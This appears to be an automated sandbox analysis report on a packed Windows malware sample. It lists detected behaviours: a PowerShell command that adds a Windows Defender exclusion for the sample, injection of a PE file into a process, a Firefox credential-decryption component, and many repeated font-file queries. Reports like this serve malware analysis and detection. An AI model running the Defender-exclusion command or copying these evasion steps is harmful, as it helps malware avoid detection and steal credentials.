Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
